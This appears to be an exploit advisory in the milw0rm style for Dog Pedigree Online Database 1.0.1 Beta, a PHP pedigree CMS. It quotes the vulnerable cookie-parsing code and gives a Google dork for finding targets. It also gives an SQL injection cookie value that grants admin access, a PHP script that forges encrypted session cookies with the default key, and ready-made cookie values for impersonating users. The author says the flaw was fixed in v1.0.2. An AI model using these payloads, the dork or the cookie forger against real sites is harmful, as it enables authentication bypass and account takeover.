Dog Pedigree Online Database 1.0.1b Insecure Cookie Handling Vuln

*********************************************************************************************** *********************************************************************************************** ** ** ** ** ** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] ** ** || || || [] [][] [] [] [] [] [] [] [] [] [] [] ** ** [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] ** ** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ **==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>-- ** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ [> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] [] ** ** ** ** ** ** ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O ** ** ¡PROUD TO BE SPANISH! ** ** ** *********************************************************************************************** *********************************************************************************************** ---------------------------------------------------------------------------------------------- | INSECURE COOKIE HANDLING VULNERABILITIES | |--------------------------------------------------------------------------------------------| | | Dog Pedigree Online Database v1.0.1-Beta | | | CMS INFORMATION: ------------------------------------------------- | | | |-->WEB: http://thewhippetarchives.net/twa_is_offline.php | |-->DOWNLOAD: http://sourceforge.net/projects/dogarchive | |-->DEMO: N/A | |-->CATEGORY: Genealogy | |-->DESCRIPTION: This project allows to setup and maintain a database for | | collecting (dog) pedigrees. The data will actually be collected... | |-->RELEASED: 2009-01-25 | | | | CMS VULNERABILITY: | | | |-->TESTED ON: firefox 3 | |-->DORK: inurl:"printable_pedigree.php" | |-->CATEGORY: COOKIE AUTH-BYPASS (SQLi) / INSECURE COOKIE HANDLING | |-->AFFECT VERSION: <= 1.0.1 Beta | |-->Discovered Bug date: 2009-05-08 | |-->Reported Bug date: 2009-05-08 | |-->Fixed bug date: 2009-05-12 | |-->Info patch (v1.0.2): http://sourceforge.net/projects/dogarchive/ | |-->Author: YEnH4ckEr | |-->mail: y3nh4ck3r[at]gmail[dot]com | |-->WEB/BLOG: N/A | |-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. | |-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) | ---------------------------------------------------------------------------------------------- ####### /////// INTRO: /////// ####### Cookie name --> it could be configured, but any web change it. Cookie protection --> Active by default, but some Webs use it and other neither (Because it needs php_mcrypt extension). With cookie protection --> Any web change the $COOKIE_KEY value. Always by default ########################### /////////////////////////// COOKIE AUTH-BYPASS (SQLi): /////////////////////////// ########################### ----------- VULN FILE: ----------- Path --> [HOME_PATH]/php_users/htdocs/ File --> users.php.inc Vuln function --> init() function init() { .... $cookie = $_COOKIE[$USER_COOKIE]; if (isset($COOKIE_KEY)) { $iv = mcrypt_create_iv(mcrypt_get_iv_size (MCRYPT_BLOWFISH, MCRYPT_MODE_ECB), MCRYPT_RAND); $cookie = mcrypt_decrypt(MCRYPT_BLOWFISH, $COOKIE_KEY, base64_decode($cookie), MCRYPT_MODE_ECB, $iv); } $cookie = rtrim($cookie); $a = split('&', $cookie); $i = 0; while ($i < count($a)) { $b = split ('=', $a[$i]); $key = urldecode($b[0]); $value = urldecode($b[1]); $this->{$key} = $value; $i++; } $this->id = $this->{'uid'}; } ... --------- EXPLOIT: --------- 1.-WITHOUT ENCRYPTION: Add cookie --> Name ~> dogarchive_user_info --> Value ~> email=&uid=-1%20or%201=1#&seclev= 2.-WITH ENCRYPTION: Add cookie --> Name ~> dogarchive_user_info --> Value ~> Ffq9xizFlqX%2FLFytv2XsUILuolhabq3%2BN5A0%2B3ifmNdjLEIqh%2BKIXA%3D%3D Return --> Admin account. ########################## ////////////////////////// INSECURE COOKIE HANDLING: ////////////////////////// ########################## <<<<-------+++++++++ Condition: Search e-mail and uid (it's not difficult) ++++++++++--------->>>> ------ NOTE: ------ Use an cookie builder (need php_mcrypt extension) to encrypt the cookie value: <?php //Configure [real_email] and [real_uid] with your target $COOKIE_KEY="somethingRAndoM9871234whateveryoulike"; //user.conf by default $cookie="email=".urlencode('[real_email]')."&uid=[real_uid]&seclev=1"; $iv = mcrypt_create_iv(mcrypt_get_iv_size (MCRYPT_BLOWFISH, MCRYPT_MODE_ECB), MCRYPT_RAND); $cookie = base64_encode(mcrypt_encrypt (MCRYPT_BLOWFISH, $COOKIE_KEY, $cookie, MCRYPT_MODE_ECB, $iv)); print "Cookie crypted-urlencode -->".urlencode($cookie)."\n"; ?> ----- PoC: ----- 1.-WITHOUT ENCRYPTION: Add cookie --> Name ~> dogarchive_user_info --> Value ~> email=[real_email]&uid=[real_uid]&seclev=1 2.-WITH ENCRYPTION: Add cookie --> Name ~> dogarchive_user_info --> Value ~> Use PHP script above --------- EXPLOIT: --------- 1.-WITHOUT ENCRYPTION: Add cookie --> Name ~> dogarchive_user_info --> Value ~> email=y3nh4ck3r@gmail.com&uid=2422&seclev=1 2.-WITH ENCRYPTION: Add cookie --> Name ~> dogarchive_user_info --> Value ~> 7O%2By0gnSt4KItondpdwQThDciQY6aR3QfFGEvZQzUGQWNkYwIUI4lfiZ1WQgnEc%2B <<<-----------------------------EOF---------------------------------->>>ENJOY IT! ####################################################################### ####################################################################### ##*******************************************************************## ## SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! ## ##*******************************************************************## ##-------------------------------------------------------------------## ##*******************************************************************## ## GREETZ TO: JosS, Ulises2k, J.McCray and Spanish Hack3Rs community!## ##*******************************************************************## ####################################################################### #######################################################################